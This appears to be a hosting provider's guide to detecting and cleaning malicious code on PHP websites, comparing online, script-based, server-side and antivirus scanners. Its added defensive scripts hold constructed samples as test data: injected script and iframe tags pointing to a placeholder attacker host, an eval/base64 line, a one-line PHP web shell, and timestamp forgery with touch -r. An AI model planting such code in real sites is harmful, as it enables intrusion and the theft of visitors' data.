Almost every site owner has at some point seen a site suddenly slow down or stop working altogether. If you have ruled out a DDoS attack, changes to the site's code and content, and changes on the hosting provider's side, the remaining explanation is usually that the site has been infected with malicious code. Such an infection can also lead to sanctions from search engines. In this article I will explain what this malicious code is, how it gets onto sites and how to deal with it.
Malicious code: types and principle of operation
Malicious code on websites is usually divided into two categories:
1. Exploits. They use vulnerabilities in the site's software to get onto the site, and once in place they perform actions the site owner never planned, for example sending spam. On sites written in PHP the exploit is most often PHP code, and it is almost always obfuscated (for example base64-encoded or compressed and run through eval()) so that it does not match simple signatures. Exploits are found on almost every infected site.
2. Viruses and Trojans. These can be classic Windows viruses or software modules for Linux. They are found on sites much less often than exploits. Recently the most common Linux modules have been cryptocurrency miners.
There is a folk rule among system administrators: "found a virus, look for the exploit". This is logical: the virus got onto the site somehow.
What does malicious code do on sites?
- It sends spam. Besides consuming system resources, this usually does not affect the operation of the site itself. The problem is that once spam starts going out from the site, mail systems such as Gmail, Outlook and Yahoo! start to treat every message from the site as spam.
- Phishing. The code steals visitors' data, for example credit card numbers, usually via an attacker's page placed on your site. This can get the site blocked at the browser level: visitors see a red warning page and nobody can get in. Other consequences: a drop in search ranking and blacklisting by Google.
- Distributes viruses to visitors' PCs.
- Mining. The attacker injects code that uses the server's resources for cryptocurrency mining. The resources are exhausted and the site stops working.
- Participation in a botnet. The site has the same problems as with phishing or mining, but in addition the server can be used to attack other sites.
How malicious code gets to the site
A typical site runs on the LAMP stack: Linux + Apache + MySQL + PHP. According to published statistics, most often this is a PHP CMS, WordPress or Joomla!. Each of these CMSs has had vulnerabilities through which malicious code can get onto the site. Vulnerabilities in WordPress and its plugins are listed in the WPScan Vulnerability Database, for Joomla! in the Joomla! Vulnerable Extensions List. In addition, the malicious code can be uploaded to the site by the developer or the site administrator. This happens either through negligence, for example when the administrator installs pirated ("nulled") versions of the CMS, themes or plugins without examining their code, or with malicious intent, for example when a client has not paid the developer and the developer takes revenge.
The scale of the problem: a view from the hosting
We collected statistics on malicious code on one of our servers. Over 45 days of daily automatic scanning, more than 3 million files were scanned and about 5,000 exploit samples were found. Not one of them was a pure virus:
It may seem that 5,000 exploits against more than 3 million files is not much, less than 1% of the files. But one exploit is enough for the site to start working for the attacker. Also, in our observation, where one file with malicious code has appeared, more will soon follow, so a typical infected site contains 10-20 or more files with malicious code. Before scanning a site for malicious code, pay attention to the following characteristics of the scanner:
- the size of its malicious-code signature database;
- how often that database is updated.
Commercial scanners, as a rule, easily outperform most free ones. For example, the free antivirus ClamAV, whose signature database is maintained by volunteers, cannot keep up with the big players on the market. One reason is that every large antivirus company runs a fleet of computers used as bait (honeypots) to collect fresh malware samples.
Types of scanners
The categories of scanners for finding malicious code on a site:
1. Online scanners: for example Rescan.pro, Sucuri, PCrisk.
Advantages: easy to use.
Disadvantages: limited scanning capabilities and a lower detection rate, since they look at the site from outside, as a visitor sees it, rather than at its files.
2. PHP script scanners: for example Ai-Bolit, phpMussel.
Advantages: they detect more than online scanners, since they scan the site's files in the same environment the site runs in.
Disadvantages: depending on the server, restrictions on running PHP may apply, so there are conditions under which the script cannot run correctly.
3. Specialized server-side exploit scanners: for example LMD (Linux Malware Detect) and CXS (ConfigServer eXploit Scanner).
Advantages: these tools run at the server level and are not limited by the PHP interpreter, so they work faster and more reliably and find malicious code better. In addition, the commercial CXS has a heuristic scan that flags suspicious objects.
Disadvantages: they detect classic viruses poorly. CXS relies on the free ClamAV, which has a small virus signature database. Both scanners are also console utilities, so using them requires some training.
Such tools are rarely available on shared web hosting; they are ideal for a VPS or a dedicated server.
4. Hybrid or cloud scanners: for example CloudScan.Pro.
With this kind of scan the site files are uploaded to the cloud of the company providing the service and analyzed there. Unfortunately we could not find a cloud scanner that can be tested for free.
5. Specialized virus scanners: for example Comodo, Kaspersky, ClamAV. This is the software commonly called antivirus; such programs are installed on most Windows PCs.
Advantages: widespread, detect viruses well.
Disadvantages: detect exploits very poorly.
6. Multi-engine scanning aggregators: for example VirusTotal, which scans an uploaded file with many antivirus engines at once.
Advantages: can be used for free to scan downloaded files for viruses.
Disadvantages: the same as for virus scanners.
Some of these scanners can also disinfect sites. But as a rule the treatment comes down to moving files to quarantine. Since a site file may contain both the site's own functional code and the injected malicious code, the site may "break" after treatment. Therefore we favour having the site disinfected by the developer or by a team that includes a developer: the developer knows how the site works and can fix the problems caused by quarantining a file that also carried functional code.
For beginners: online scanners and PC antiviruses
Scanning with online scanners
As an example we took an infected site and scanned it with free or shareware tools. Results from the Sucuri and ReScan.pro online scanners:
Despite its ease, online scanning has shortcomings:
- As seen in the screenshots, an online scanner does not detect all samples of malicious code.
- Online scanners cannot disinfect sites.
We recommend online scanning as a quick test. If an online scanner has found malicious code, check the site and disinfect it with the more advanced tools described below.
Scan using PC antivirus
To check the site with a PC antivirus:
1. Download the site code to your computer. If you can, download it as an archive: the malicious files cannot do anything while they sit in an archive, and in any case do not open or run the downloaded PHP files locally. Most hosters have a file manager for this.
Alternatively, use an FTP or SFTP client to connect to the server and download the files.
2. Dump the site database. You can usually get a dump with phpMyAdmin, which most hosters provide.
There are cases where malicious code is stored in the database and extracted from there by the attacker's script. This is rare, but the dump still needs to be checked.
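Checking the dump before handing it to an antivirus is easy with grep. The following script is an added example, not code from the article or from any of the tools it names: it searches a MySQL dump for content that does not belong in the posts or options tables of an ordinary site (script tags loading third-party hosts, hidden iframes, PHP that a dropper would later eval()). The patterns and the two sample dumps are constructed for illustration, and attacker.invalid is a placeholder host.

```shell
#!/bin/sh
# Added example, not code from the article: grep-based triage of a SQL dump.
# Both sample dumps below are constructed; attacker.invalid is a placeholder host.

# Content that has no business in the posts/options tables of an ordinary site.
# Each alternative is a plain ERE; grep -i makes them case-insensitive.
DUMP_PATTERNS='<script[^>]*src=|<iframe|eval\(|base64_decode\(|gzinflate\(|document\.write\(unescape|String\.fromCharCode|display: ?none'

# count_dump_hits FILE  -> number of dump lines matching any pattern (0 if none)
count_dump_hits() {
    grep -c -i -E "$DUMP_PATTERNS" "$1" || true   # grep -c exits 1 on zero matches
}

# scan_dump FILE  -> prints "line:snippet" for each suspicious row;
#                    returns 0 when the dump looks clean, 1 when something was found
scan_dump() {
    hits=$(grep -n -i -E "$DUMP_PATTERNS" "$1" | cut -c 1-160)
    if [ -z "$hits" ]; then return 0; fi
    printf '%s\n' "$hits"
    return 1
}

# --- constructed sample data -----------------------------------------------
WORK=$(mktemp -d)    # left in place so the dumps can be inspected; rm -rf "$WORK" when done

cat > "$WORK/clean.sql" <<'EOF'
INSERT INTO wp_posts VALUES (1,'Hello world','<p>Welcome to the site.</p>');
INSERT INTO wp_options VALUES (2,'siteurl','https://example.com');
EOF

cat > "$WORK/infected.sql" <<'EOF'
INSERT INTO wp_posts VALUES (1,'Hello world','<p>Welcome to the site.</p>');
INSERT INTO wp_posts VALUES (7,'Promo','<div style="display:none"><iframe src="http://attacker.invalid/x.html"></iframe></div>');
INSERT INTO wp_options VALUES (99,'widget_text','<script src="http://attacker.invalid/js.php"></script>');
INSERT INTO wp_options VALUES (100,'cache_data','eval(base64_decode("cGhwaW5mbygpOw=="));');
EOF

for dump in "$WORK/clean.sql" "$WORK/infected.sql"; do
    printf '== %s: %s suspicious row(s)\n' "$dump" "$(count_dump_hits "$dump")"
    scan_dump "$dump" || printf '   -> review these rows in phpMyAdmin before restoring the dump\n'
done
```

A hit is a row to look at, not a verdict: legitimate widgets and page builders also store inline scripts and display:none, so expect false positives and read the matched row before deleting anything. For the same reason the function reports rows instead of editing the dump.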
Results of scanning the same infected site with the Windows Defender scanner:
As a rule, PC antivirus databases contain no signatures for the exploits used on sites. Despite this, we recommend PC antivirus both as a quick test and as a means of initial treatment.
If the antivirus found malicious code, use it to disinfect the site. After that, check and treat the site with the specialized exploit scanners.
If the site is small, up to 256 MB, you can use the VirusTotal aggregator. Using it is as easy as the other online scanners: you point it at the archive with the site and the database on your PC. Keep in mind that files uploaded to VirusTotal are shared with its security partners, so remove configuration files with credentials (for example wp-config.php) and any database tables with user data before uploading. In our case the full size of the site was more than 256 MB, so we checked its files selectively. As the screenshot shows, VirusTotal ran 58 antivirus engines for PCs, and only 19 of the 58 detected malicious code in the archive.
For advanced users: scanners-PHP scripts and specialized software scanners
Using these scanners requires technical knowledge, the ability to work with the Linux command line and installed programs and tools. If you do not have them, site developers, system administrators, hosting technical support or the scanning tool vendors can help.
The most universal option is to download the site code and its database to a local PC and scan them there: you can then install and use any software regardless of the hosting or server the site lives on. The computer on which the downloaded files are scanned should run Linux. When scanning on the hosting or server side the procedure is the same; you only need to connect to the hosting or server over SSH.
Scanners – PHP Scripts
To scan files with script scanners you need a PHP interpreter and the ability to run PHP scripts from the command line. PHP-based scanners can be used on any operating system that supports PHP: Linux, Mac, Windows and others.
In theory, script scanners can be run on the server hosting the website. In practice there are often restrictions:
- Not all hosters provide SSH access.
- Hosting may limit the execution time of PHP scripts, so a scan may never complete.
As an example we tested the AI-Bolit scanner, which is free for non-commercial use.
To scan the site:
- Download the scanner archive and unpack its ai-bolit subdirectory into the root directory of the site, on the local PC or on the hosting.
- On the command line, go to the directory where AI-Bolit was unpacked and run one of the commands:
For an express scan: $ php ai-bolit.php --mode=1
For a paranoid (most thorough) scan, recommended before disinfecting: $ php ai-bolit.php --mode=2
The scanner prints a short summary of the results to the command line and writes a full HTML report:
Unlike online scanners, script scanners are full-fledged tools that can scan a site thoroughly. Often this is the only tool available for scanning a website on shared hosting.
Specialized software scanners
To install LMD (Linux Malware Detect), run the following commands as root:
- # cd ~ – go to the home directory;
- # wget <download link> – download the latest version archive, maldetect-current.tar.gz, into the current directory;
- # tar -xvf maldetect-current.tar.gz – unpack the archive;
- # ls -d */ | grep maldetect – find the name of the newly unpacked directory;
- # cd maldetect-1.6.2 – go to that directory (the version number in the name will differ);
- # ./install.sh – run the installation.
After installation you can run the following commands:
- # maldet -a /path/to/files – scan the directory where the site is located; /path/to/files is the location of the site files to be scanned;
- # maldet --report 180731-2020.1148 – view the scan report; the report ID is printed at the end of the previous command's output;
- # maldet -q 180731-2020.1148 – move all files listed in that report to quarantine.
Scan results for the infected site:
For comparison, results of the commercial CXS scan:
Results of scanning the test site with three scanners:
- AI-Bolit: 184 malicious scripts;
- maldet / LMD: 57 malware hits;
- CXS: 65 fingerprints + 10 Viruses.
The number of detected objects differs between reports because the scanners use different signature bases, terminology and ways of counting objects with malicious code. For example, AI-Bolit counts doorway pages as malicious scripts even though they contain no malicious code, whereas maldet/LMD and CXS do not.
What to do after scanning the site
After you have detected the malicious code and, possibly, moved it to quarantine, you need to think about disinfecting the site.
One of the most reliable methods: restore every file that contained malicious code from a backup made before the site was infected. This is only a good option if you are sure that no changes were made to the site files after the backup was created, and that the backup really predates the compromise rather than just its discovery.
In our testing none of the tools could guarantee an automatic restore of the site to its pre-hack state. Therefore only cooperation with the developer, together with restoring files and database contents from backups, gives you some guarantees. Also, at the treatment stage the site's developers must find out how the malicious code got onto the site. Some tools can help with vulnerability information: the AI-Bolit utility reports known vulnerabilities in the narrow range of software it knows, and CXS reports every outdated software version it knows of.
Relapse prevention
After you have removed the malicious code from the site, take precautions:
1. Change the passwords of all accounts related to the site (CMS administrators, database, FTP/SFTP and SSH, hosting control panel). The intruder had access to the site and may have kept a backdoor for himself.
2. Update the CMS and its plugins regularly and promptly to prevent a repeat break-in.
In our experience with a recent vulnerability in the Drupal CMS, the first signs of malicious code on sites were recorded 36-48 hours after the vulnerability and its fix (updating the CMS to the latest version) were published. Had our clients who were hacked updated the CMS in time, there would have been no problem.
3. Monitor the site regularly.
4. Back up regularly.
There is no perfect product that is free, convenient, finds every sample of malicious code, disinfects the site and works on every server. But if you combine several measures, using a scanner, regularly creating backups and updating the CMS, you can solve almost all problems with malicious code on the site.
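Two of the precautions above, a backup to compare against and regular monitoring, and the restore-from-backup advice in the previous section all come down to one operation: knowing which files differ from a known-good copy. Attackers routinely copy the timestamp of a neighbouring file onto their backdoor (touch -r), so a search for recently modified files misses it, while a content-hash comparison does not. The following script is an added example and not code from the article: it builds a sha256 list of a site tree, compares two such lists, and contrasts that with a plain find -newer search. The backup and "live" site trees, the planted backdoor and the 2018-01-01 timestamp are all constructed for the demonstration.

```shell
#!/bin/sh
# Added example, not code from the article: file-integrity comparison of a live
# site against a known-good copy. All files and timestamps below are constructed.

# sha256sum is GNU coreutils; fall back to shasum on BSD/macOS.
if command -v sha256sum >/dev/null 2>&1; then HASH="sha256sum"; else HASH="shasum -a 256"; fi

# baseline DIR -> "hash  ./relative/path" for every regular file, sorted by path
baseline() {
    (cd "$1" && find . -type f -exec $HASH {} + | sort -k 2)
}

# recent_changes DIR REF_FILE -> files whose mtime is newer than REF_FILE's
# (what "find files modified in the last N days" relies on)
recent_changes() {
    find "$1" -type f -newer "$2" | sort
}

# compare BASELINE_LIST CURRENT_LIST -> ADDED / MODIFIED / REMOVED lines
# Keyed on the full path (everything after "hash  "), so paths with spaces survive.
compare() {
    awk '
        NR == FNR { h = $1; sub(/^[^ ]+  /, ""); base[$0] = h; next }   # first file: baseline
                  { h = $1; sub(/^[^ ]+  /, ""); cur[$0]  = h }         # second file: current
        END {
            for (p in cur)  if (!(p in base))                     print "ADDED    " p
            for (p in cur)  if ((p in base) && base[p] != cur[p]) print "MODIFIED " p
            for (p in base) if (!(p in cur))                      print "REMOVED  " p
        }' "$1" "$2" | sort
}

# --- constructed backup and live site ---------------------------------------
WORK=$(mktemp -d)       # left in place for inspection; rm -rf "$WORK" when done
BACKUP="$WORK/backup"; LIVE="$WORK/live"
mkdir -p "$BACKUP/wp-content/uploads"
printf '<?php require __DIR__ . "/wp-blog-header.php";\n' > "$BACKUP/index.php"
printf '<?php define("DB_NAME", "wp");\n'                 > "$BACKUP/wp-config.php"
printf 'User-agent: *\nDisallow:\n'                        > "$BACKUP/robots.txt"
find "$BACKUP" -exec touch -t 201801010000 {} +            # pretend the backup is from 1 Jan 2018
cp -pR "$BACKUP" "$LIVE"                                   # live site starts identical (-p keeps mtimes)

# Simulated compromise: a backdoor appears in uploads/ and index.php gets an
# include line prepended; then the attacker copies wp-config.php's timestamp
# onto both files so they do not stand out as "recently modified".
printf '<?php @eval($_POST["c"]); ?>\n' > "$LIVE/wp-content/uploads/.sess.php"
{ printf '<?php @include __DIR__ . "/wp-content/uploads/.sess.php";\n'; cat "$BACKUP/index.php"; } > "$LIVE/index.php"
touch -r "$BACKUP/wp-config.php" "$LIVE/index.php" "$LIVE/wp-content/uploads/.sess.php"

echo "Changed according to mtime (find -newer robots.txt):"
recent_changes "$LIVE" "$BACKUP/robots.txt"                # prints nothing: the timestamps were forged
echo "Changed according to content hashes:"
baseline "$BACKUP" > "$WORK/baseline.sha256"
baseline "$LIVE"   > "$WORK/live.sha256"
compare "$WORK/baseline.sha256" "$WORK/live.sha256"        # ADDED .sess.php, MODIFIED index.php
```

For monitoring, store the baseline list somewhere the web server user cannot write (or off the server entirely) and run the comparison from cron; the same list doubles as the answer to "which files changed since the backup" when you decide what to restore. A hash list only covers files, so the database dump still needs its own check.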
Conclusion
To detect malicious code on a site, scan the site's files and database with one or more tools:
- an antivirus (or the VirusTotal aggregator);
- specialized scanners (Ai-Bolit, Linux Malware Detect, ConfigServer eXploit Scanner).
For a quick scan you can use online scanners (Rescan.pro, Sucuri, PCrisk). After restoring the site (in case of infection), find out how the malicious code got onto the site and, if the cause is an outdated CMS or plugins, update them.